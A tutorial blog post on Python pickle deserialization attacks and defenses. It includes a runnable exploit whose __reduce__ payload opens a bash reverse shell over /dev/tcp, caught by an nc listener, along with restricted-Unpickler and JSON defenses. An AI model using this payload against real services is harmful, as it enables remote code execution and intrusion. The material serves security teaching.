

Python Deserialization Attacks Explained: How Hackers Exploit Pickle (and How to Defend)
Heard someone talk about .NET serialization? Vulnerabilities involving byte streams? Something like that?
You might not have, but deserialization bugs are common, powerful and often misunderstood.
Let’s take a deep technical look at deserialization attacks, focusing on Python - .NET and Ruby will follow in other posts.
Introduction to Python Deserialization Attacks
Serialization is the “process of converting a data structure or object into a byte stream”; it makes it easy to save data to a file or transmit it over a network. The reverse process is deserialization: converting a byte stream back into the original data structure or object.
Serialization is kind of like freezing an object in time - deserialization is waking it back up.
However, this convenient process can be extremely dangerous: if you deserialize user-supplied data without strict controls, you might just wake up a bomb.
What are Deserialization Attacks?
In a deserialization attack, an attacker embeds malicious code in serialized data, and that code ends up being executed when the data is deserialized.
You can read more about the formal definition and risk management perspective of that here: https://owasp.org/www-community/vulnerabilities/Insecure_Deserialization
How Python’s Pickle Module Works (Serialization & Deserialization Explained)
In this section, I’m referencing this great article; be sure to check it out and see how they explain it!
Hackers love Python’s Pickle module - and not because it’s tasty. In the wrong hands, Pickle can turn your server into an open door for remote code execution. In this guide, you’ll learn how Python deserialization attacks work, see a real exploit in action, and learn exactly how to defend against them.
pickle is included in the Python standard library, so there is no need to install it.
It mainly serves to (de-)serialize Python objects, whether that be simple data or complex structures like dictionaries.
Serializing Python Code
import pickle

data = {
    'Name': 'James Bond',
    'Rank': 'Commander, Royal Navy Reserve',
    'Birthday': '13. April 1968',
    'Hair': 'Sandy brown, short'
}

with open('bond.pickle', 'wb') as handle:
    pickle.dump(data, handle)

data_bytes = pickle.dumps(data)
print(data_bytes)
pickle.dump writes the serialized object into the file we specified; pickle.dumps returns a byte stream containing the serialized data:
Serialized Object: Showcase
b'\x80\x04\x95x\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04Name\x94\x8c\nJames Bond\x94\x8c\x04Rank\x94\x8c\x1dCommander, Royal Navy Reserve\x94\x8c\x08Birthday\x94\x8c\x0e13. April 1968\x94\x8c\x04Hair\x94\x8c\x12Sandy brown, short\x94u.'
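That byte string is not an opaque blob: it is a small program for pickle's stack-based virtual machine. As a rough illustration, the standard library's pickletools module can list its opcodes without loading anything. The shortened dictionary and the explicit protocol=4 are choices made for this sketch, not part of the example above.

```python
import pickle
import pickletools

# Shortened version of the Bond dictionary; protocol 4 is pinned so the
# opcode listing does not depend on the interpreter's default protocol.
data = {'Name': 'James Bond', 'Hair': 'Sandy brown, short'}
data_bytes = pickle.dumps(data, protocol=4)

# genops() walks the stream and yields (opcode, argument, position)
# without executing any of the instructions.
opcode_names = [opcode.name for opcode, arg, pos in pickletools.genops(data_bytes)]
print(opcode_names)

# dis() prints a human-readable disassembly of the same stream.
pickletools.dis(data_bytes)
```

Plain data like this only needs opcodes that push values and build containers. The exploit later in this post relies on opcodes that import and call things.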
Protocol Note
When using pickle.dump, it is recommended to pass protocol=pickle.HIGHEST_PROTOCOL as a parameter to get the newest pickle format your interpreter supports (though this won’t help you with security!).
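A quick way to see what the protocol parameter changes is to look at the first two bytes of the stream. This is only a sketch with a made-up one-key dictionary. It relies on the fact that protocol 2 and later begin with the PROTO opcode (0x80) followed by the protocol number.

```python
import pickle

data = {'Name': 'James Bond'}

# Explicitly request the newest protocol this interpreter supports.
newest = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)
# Without the argument, pickle.DEFAULT_PROTOCOL is used.
default = pickle.dumps(data)

# Byte 0 is the PROTO opcode, byte 1 is the protocol number.
print(pickle.HIGHEST_PROTOCOL, newest[:2])
print(pickle.DEFAULT_PROTOCOL, default[:2])

# loads() detects the protocol on its own, so both streams round-trip.
same = pickle.loads(newest) == pickle.loads(default) == data
print(same)
```

Note that the loader accepts every protocol it knows, which is one reason the protocol choice has no bearing on security.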
Deserializing Python code
If you want to reverse what we just did, follow along:
import pickle

with open('bond.pickle', 'rb') as handle:
    data = pickle.load(handle)

print(data)
outputs (who would’ve thought):
{'Name': 'James Bond', 'Rank': 'Commander, Royal Navy Reserve', 'Birthday': '13. April 1968', 'Hair': 'Sandy brown, short'}
You can also directly deserialize a byte stream: data = pickle.loads(data_bytes).
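The reason people reach for pickle in the first place is that the round trip preserves Python-specific types. Here is a small in-memory sketch; the record and its field names are invented for illustration.

```python
import pickle
from datetime import date

# Illustrative record mixing types that plain JSON cannot represent directly.
record = {
    'name': 'James Bond',
    'birthday': date(1968, 4, 13),   # datetime.date object
    'tags': {'agent', 'navy'},       # a set
    'position': (51.5, -0.12),       # a tuple stays a tuple
}

# Serialize to bytes and immediately load the bytes back.
restored = pickle.loads(pickle.dumps(record))

print(restored == record)            # equal content
print(restored is record)            # but a new, independent object
print(type(restored['tags']), type(restored['position']))
```

That fidelity comes from pickle being able to reconstruct arbitrary objects, which is exactly the capability an attacker abuses.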
Now, onto the real deal: Should we do a real deserialization example? Yaaay!
Exploiting Python Pickle Deserialization Vulnerabilities – A Step-by-Step Example
Let’s say we find a Python web application that accepts user-supplied data, stores it as a pickled object, and later loads it for session handling, caching, or state restoration.
Here’s a vulnerable snippet simulating that behavior:
Vulnerable code
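import base64
import pickle

def load_user_data(serialized_data):
    # Vulnerable: unpickles whatever bytes it is given
    return pickle.loads(serialized_data)

# Simulated untrusted input from user/session/cookie etc.
# Pickles are binary, so this simulation expects them base64-encoded.
user_input = base64.b64decode(input("Paste your base64-encoded serialized data: "))
user_data = load_user_data(user_input)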
This code blindly deserializes whatever input it receives. Now let’s exploit it.
Crafting a Malicious Payload
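We’ll build a Python class that triggers arbitrary command execution upon deserialization - using the __reduce__() method. __reduce__() tells pickle how to rebuild an object by returning a callable plus its arguments, and the unpickler calls that callable while loading.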
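Before reaching for a shell command, the mechanism can be seen with a harmless stand-in. The Demo class below is hypothetical and exists only for this sketch: it asks pickle to call sorted() instead of os.system().

```python
import pickle

class Demo:
    # Hypothetical class for illustration only.
    def __reduce__(self):
        # Tell pickle: "to rebuild me, call sorted([3, 1, 2])".
        return (sorted, ([3, 1, 2],))

payload = pickle.dumps(Demo())

# Unpickling calls sorted(...) and hands back whatever it returns.
result = pickle.loads(payload)

print(result)                    # [1, 2, 3]
print(isinstance(result, Demo))  # False
```

The loader never needs the Demo class at all. It simply runs the callable named in the stream, which is why swapping sorted for os.system turns this into code execution.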
Step 1: Attacker creates and saves malicious pickle
# attacker.py
import pickle
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('/bin/bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"',))

payload = pickle.dumps(Exploit())

with open("malicious.pkl", "wb") as f:
    f.write(payload)

print("[*] Malicious pickle written to file.")
This simulates the attacker crafting a payload and sending it to the server (via a file, cookie, request, etc.).
Step 2: Victim deserializes the malicious object
# victim.py
import pickle

with open("malicious.pkl", "rb") as f:
    data = f.read()

print("[*] Deserializing received object...")
pickle.loads(data)
Step 3: Simulate
Start nc -lvnp 4444 in a terminal on your computer.
In a second terminal, run python3 attacker.py to serialize our payload. (Running chmod +x attacker.py and chmod +x victim.py beforehand is optional, since both scripts are started through python3.)
Then, you can pretend you are the unknowing victim (e.g. the mentioned web app) and run python3 victim.py. See what happens! If everything works, the nc listener should receive an interactive bash shell.
How to Defend Against Python Deserialization Attacks
Principle of Secure Deserialization
The number one rule is simple: Never deserialize data from untrusted sources.
Python’s pickle module is powerful - but also dangerous. It was never designed for secure use with external input. If an attacker can influence the serialized data, they can embed malicious logic that executes arbitrary code at deserialization time.
Even if you’re deserializing internal data, it’s worth asking: “What happens if this data gets tampered with?”
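One common answer to the tampering question is to authenticate the bytes before unpickling them. The following is a minimal sketch using the standard library's hmac module. SECRET_KEY, sign_and_dump, and verify_and_load are names invented here, and the hard-coded key is a placeholder that would come from configuration in a real deployment.

```python
import hashlib
import hmac
import pickle

# Assumption: a secret known only to the server (placeholder value).
SECRET_KEY = b'replace-with-a-real-secret'
DIGEST_SIZE = hashlib.sha256().digest_size  # 32 bytes for SHA-256

def sign_and_dump(obj):
    """Return an HMAC-SHA256 tag followed by the pickled object."""
    payload = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload

def verify_and_load(blob):
    """Unpickle only if the tag matches; raise ValueError otherwise."""
    tag, payload = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    # compare_digest avoids leaking information through timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: refusing to unpickle")
    return pickle.loads(payload)

blob = sign_and_dump({'user': 'alice'})
print(verify_and_load(blob))

# Flip one bit in the last byte to simulate tampering.
tampered = blob[:-1] + bytes([blob[-1] ^ 0x01])
try:
    verify_and_load(tampered)
except ValueError as exc:
    print(exc)
```

This only shows that the data was produced by someone holding the key. It does not make pickle safe for data an attacker authored, and it fails entirely if the key leaks.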
Option 1: Restrict What Can Be Deserialized
If you must use pickle, consider tightly controlling what types can be reconstructed. One way to do this is by subclassing pickle.Unpickler and overriding its behavior.
Example: Safe Unpickler with Type Restrictions
import builtins
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow safe built-in types
        if module == "builtins" and name in {"str", "list", "dict", "set", "int", "float", "bool"}:
            return getattr(builtins, name)
        # Everything else (os.system, eval, custom classes, ...) is rejected
        raise pickle.UnpicklingError(f"Attempted to load forbidden class: {module}.{name}")

def restricted_loads(s):
    # Drop-in replacement for pickle.loads() that uses the restricted unpickler
    return RestrictedUnpickler(io.BytesIO(s)).load()
Usage:
data = restricted_loads(serialized_input)
This approach lets you deserialize known-safe types like dictionaries or strings, but rejects every other global lookup, including the function references and classes (such as os.system) that attackers rely on in exploits.
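To check that the allow-list behaves as described, here is a self-contained sketch that repeats the restricted unpickler and feeds it one benign and one hostile-looking pickle. Probe is a hypothetical, harmless stand-in for the Exploit class: it asks for os.getpid() rather than a shell.

```python
import builtins
import io
import os
import pickle

SAFE_BUILTINS = {"str", "list", "dict", "set", "int", "float", "bool"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve only allow-listed built-ins; refuse everything else.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"Attempted to load forbidden class: {module}.{name}")

def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

class Probe:
    # Harmless stand-in for an exploit: asks pickle to call os.getpid().
    def __reduce__(self):
        return (os.getpid, ())

# Plain data never needs find_class, so it loads normally.
safe = restricted_loads(pickle.dumps({'name': 'alice', 'roles': ['user']}))
print(safe)

# The probe needs a global lookup, which the allow-list refuses.
blocked = False
try:
    restricted_loads(pickle.dumps(Probe()))
except pickle.UnpicklingError as exc:
    blocked = True
    print("blocked:", exc)
```

The design choice here is an allow-list rather than a deny-list: anything not explicitly permitted fails, so a new dangerous callable does not slip through by default.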
Caveat: This still isn’t bulletproof. It’s a band-aid over a fundamentally unsafe mechanism. Avoid pickle entirely for any remotely user-controlled input.
Option 2: Use a Safer Format – JSON
In most cases, you don’t need pickle. If your app just stores basic data like strings, numbers, lists, or dictionaries - use json.
- It’s safer: no code execution risk
- It’s portable: works across languages
- It’s readable and debuggable
Example:
import json
# Serialize
data = {'username': 'alice', 'roles': ['user', 'admin']}
data_json = json.dumps(data)
# Deserialize
data = json.loads(data_json)
JSON won’t let you encode custom Python objects or functions - and that’s exactly why it’s safe.
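If you do have custom objects, the usual pattern is to convert them to plain data yourself and rebuild them explicitly on load. This is a sketch under the assumption of a simple dataclass; User is a hypothetical type invented for the example.

```python
import json
from dataclasses import dataclass, asdict

@dataclass
class User:  # hypothetical example type
    username: str
    roles: list

alice = User('alice', ['user', 'admin'])

# json refuses objects it does not know how to encode.
try:
    json.dumps(alice)
    refused = False
except TypeError as exc:
    refused = True
    print("json refused:", exc)

# Convert to plain data explicitly, then rebuild the object on load.
encoded = json.dumps(asdict(alice))
restored = User(**json.loads(encoded))
print(restored == alice)
```

The rebuild step is code you wrote and control, so the incoming data can only fill in fields. It cannot choose which function gets called.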
TL;DR Defensive Checklist
✅ Safe Practice | 🚫 Avoid |
---|---|
Use json, yaml.safe_load, or custom schemas | pickle.loads() on untrusted data |
If using pickle, restrict types with a custom Unpickler | Using eval() or marshal with user input |
Validate and sanitize all input before deserialization | Blindly trusting data from files, cookies, or sessions |
Bonus Tip: Log What You’re Deserializing
In applications that require complex data loading, log the structure of what you’re deserializing before acting on it. This can catch anomalies and help with incident response if things go wrong.
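For pickle specifically, the structure has to be inspected without loading it, because loading is the dangerous step. One possible sketch uses pickletools.genops to list the globals a stream would import. referenced_globals is a name made up here, and the STACK_GLOBAL handling is a heuristic that only covers the common case where both names are pushed as string literals.

```python
import pickle
import pickletools

def referenced_globals(data):
    """List (module, name) pairs a pickle would import, without executing it."""
    found = []
    recent_strings = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name == 'GLOBAL':
            # Protocols up to 3: the argument is "module name" in one string.
            module, name = arg.split(' ', 1)
            found.append((module, name))
        elif opcode.name == 'STACK_GLOBAL':
            # Protocol 4+: module and name were pushed as strings beforehand.
            if len(recent_strings) >= 2:
                found.append((recent_strings[-2], recent_strings[-1]))
            else:
                found.append(('<unknown>', '<unknown>'))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found

class Demo:
    # Hypothetical, harmless payload: asks pickle to call sorted().
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

plain = referenced_globals(pickle.dumps({'a': 1}, protocol=4))
suspicious = referenced_globals(pickle.dumps(Demo(), protocol=4))
print(plain)       # plain data references no globals
print(suspicious)  # the callable shows up before anything runs
```

A result like this can be written to your logs or compared against an allow-list before deciding whether to load at all. Treat it as a diagnostic aid rather than a security boundary, since a crafted stream can defeat simple heuristics.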